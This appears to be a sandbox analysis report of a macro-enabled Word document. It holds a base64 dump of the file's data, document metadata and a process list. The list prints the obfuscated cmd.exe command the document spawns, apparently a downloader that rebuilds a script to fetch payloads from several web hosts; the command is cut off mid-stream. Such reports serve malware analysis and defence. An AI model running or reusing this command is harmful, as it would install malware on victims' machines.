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 AFQATwBPAFAARQBOAAAAQAAAC/AEAAAAEjRWeD==
WordDocumentDocSuppDataBinDataName:	editdata.mso
WordDocumentStylesStyleRPrRFontsCs:	Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi:	Tahoma
WordDocumentStylesStyleRPrRFontsAscii:	Tahoma
WordDocumentStylesStyleRsidVal:	005A24B1
WordDocumentStylesStyleLinkVal:	BalloonTextChar
WordDocumentStylesStyleBasedOnVal:	Normal
WordDocumentStylesStyleTblPrTblCellMarRightType:	dxa
WordDocumentStylesStyleTblPrTblCellMarRightW:	108
WordDocumentStylesStyleTblPrTblCellMarBottomType:	dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW:	-
WordDocumentStylesStyleTblPrTblCellMarLeftType:	dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW:	108
WordDocumentStylesStyleTblPrTblCellMarTopType:	dxa
WordDocumentStylesStyleTblPrTblCellMarTopW:	-
WordDocumentStylesStyleTblPrTblIndType:	dxa
WordDocumentStylesStyleTblPrTblIndW:	-
WordDocumentStylesStyleUiNameVal:	Table Normal
WordDocumentStylesStyleRPrLangBidi:	AR-SA
WordDocumentStylesStyleRPrLangFareast:	EN-US
WordDocumentStylesStyleRPrLangVal:	EN-US
WordDocumentStylesStyleRPrSz-csVal:	22
WordDocumentStylesStyleRPrSzVal:	22
WordDocumentStylesStyleRPrFontVal:	Calibri
WordDocumentStylesStylePPrSpacingLine-rule:	auto
WordDocumentStylesStylePPrSpacingLine:	259
WordDocumentStylesStylePPrSpacingAfter:	160
WordDocumentStylesStyleNameVal:	Normal
WordDocumentStylesStyleStyleId:	Normal
WordDocumentStylesStyleDefault:	on
WordDocumentStylesStyleType:	paragraph
WordDocumentStylesLatentStylesLsdExceptionName:	Normal
WordDocumentStylesLatentStylesLatentStyleCount:	375
WordDocumentStylesLatentStylesDefLockedState:	off
WordDocumentStylesVersionOfBuiltInStylenamesVal:	7
WordDocumentFontsFontSigCsb-1:	00000000
WordDocumentFontsFontSigCsb-0:	000001FF
WordDocumentFontsFontSigUsb-3:	00000000
WordDocumentFontsFontSigUsb-2:	00000009
WordDocumentFontsFontSigUsb-1:	C0007841
WordDocumentFontsFontSigUsb-0:	E0002AFF
WordDocumentFontsFontPitchVal:	variable
WordDocumentFontsFontFamilyVal:	Roman
WordDocumentFontsFontCharsetVal:	00
WordDocumentFontsFontPanose-1Val:	02020603050405020304
WordDocumentFontsFontName:	Times New Roman
WordDocumentFontsDefaultFontsCs:	Times New Roman
WordDocumentFontsDefaultFontsH-ansi:	Calibri
WordDocumentFontsDefaultFontsFareast:	Calibri
WordDocumentFontsDefaultFontsAscii:	Calibri
WordDocumentDocumentPropertiesVersion:	16
WordDocumentDocumentPropertiesCharactersWithSpaces:	1
WordDocumentDocumentPropertiesParagraphs:	1
WordDocumentDocumentPropertiesLines:	1
WordDocumentDocumentPropertiesCharacters:	1
WordDocumentDocumentPropertiesWords:	-
WordDocumentDocumentPropertiesPages:	1
WordDocumentDocumentPropertiesLastSaved:	2019:01:22 15:05:00Z
WordDocumentDocumentPropertiesCreated:	2019:01:22 15:05:00Z
WordDocumentDocumentPropertiesTotalTime:	-
WordDocumentDocumentPropertiesRevision:	1
WordDocumentIgnoreSubtreeVal:	http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent:	no
WordDocumentEmbeddedObjPresent:	no
WordDocumentMacrosPresent:	yes

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
2808	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\6220939475763.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
3968	c:\j9656\k4197\v1873\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set kQXu=uh$oQv2m'dr%YE+Fe;g~ZBzpiLG8aIx{-kjOtN=yS7f)/WnT10sb6Pq4.C3VDRc5_}(9,\w@lAH XM:UK&&for %L in (23;3;70;11;53;79;21;25;29;57;78;19;63;68;48;11;10;11;40;13;40;40;29;35;37;37;73;77;13;78;19;32;55;68;48;11;1;11;47;13;77;53;78;19;32;58;68;48;11;72;72;75;2;1;48;63;41;67;38;8;46;48;27;55;52;8;17;2;0;52;52;6;27;38;46;16;70;32;3;51;34;16;62;36;75;37;16;36;56;45;16;51;57;72;24;16;46;36;17;2;3;67;6;27;27;38;8;1;36;36;23;78;44;44;70;70;70;56;28;23;42;32;16;46;36;10;16;23;10;24;50;16;50;27;49;56;62;3;7;44;18;74;67;13;54;52;4;23;6;54;21;73;50;51;37;71;1;36;36;23;78;44;44;70;70;70;56;9;16;5;24;36;42;3;10;70;28;10;9;56;62;3;7;44;74;0;62;80;23;18;54;50;36;52;79;28;39;64;59;7;80;77;71;1;36;36;23;78;44;44;62;28;7;32;36;16;62;1;56;24;10;44;41;48;26;61;54;34;22;42;10;20;71;1;36;36;23;78;44;44;72;28;34;24;10;28;42;28;50;3;23;1;24;16;56;62;3;7;44;70;23;32;24;46;62;72;0;9;16;50;44;47;74;61;67;10;13;33;72;45;76;29;22;20;42;71;1;36;36;23;78;44;44;16;50;9;16;56;28;72;44;59;26;4;12;60;45;23;59;64;13;6;27;13;13;55;76;33;33;8;56;40;23;72;24;36;66;8;71;8;43;17;2;5;41;63;27;41;38;8;34;55;67;58;58;8;17;2;46;58;52;67;55;75;38;75;8;52;55;58;8;17;2;1;6;6;41;38;8;36;55;63;55;6;8;17;2;34;63;27;67;55;38;2;16;46;5;78;36;16;7;23;14;8;69;8;14;2;46;58;52;67;55;14;8;56;16;30;16;8;17;42;3;10;16;28;62;1;66;2;3;58;49;67;67;75;24;46;75;2;3;67;6;27;27;43;31;36;10;39;31;2;0;52;52;6;27;56;60;3;70;46;72;3;28;9;15;24;72;16;66;2;3;58;49;67;67;68;75;2;34;63;27;67;55;43;17;2;42;41